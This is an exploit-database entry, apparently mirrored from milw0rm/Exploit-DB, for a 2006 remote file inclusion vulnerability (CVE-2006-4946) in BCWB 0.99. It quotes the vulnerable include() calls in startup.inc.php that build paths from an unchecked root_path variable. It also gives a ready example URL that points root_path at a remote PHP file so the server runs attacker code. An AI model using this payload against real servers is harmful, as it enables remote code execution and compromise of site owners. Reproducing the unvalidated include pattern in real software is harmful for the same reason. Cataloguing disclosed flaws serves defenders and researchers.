[] NeoSense
E X P L O I T S
title author type platform port cve id

BCWB 0.99 - 'ROOT_PATH' Remote File Inclusion

Author: ajann
type: webapps
platform: php
port: 
date_added: 2006-09-18 
date_updated: 2016-09-09 
verified: 1 
codes: OSVDB-29022;CVE-2006-4946 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.combcwb_v099.zip
*******************************************************************************
# Title  :  Bcwb 0.99(root_path)Remote File Include Vulnerability

# Author :   ajann

# Greetz :   shadow and Suskun for host : )

# Exploit;

*******************************************************************************
[File]
startup.inc.php
[/File]

[Code,1]
startup.inc.php Error:


..
....
// Debug services
include($root_path.'include/startup/debug.inc.php');
include($root_path.'include/startup/common_functions.inc.php');
include($root_path.'include/lib/data.lib.php');
....
..

Key [:] root_path=http://target.com/command.php?

\Example:

http://target.com/include/startup.inc.php?root_path=http://target.com/command.php?

# ajann,Turkey
# ...
# Im not Hacker!

# milw0rm.com [2006-09-19]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.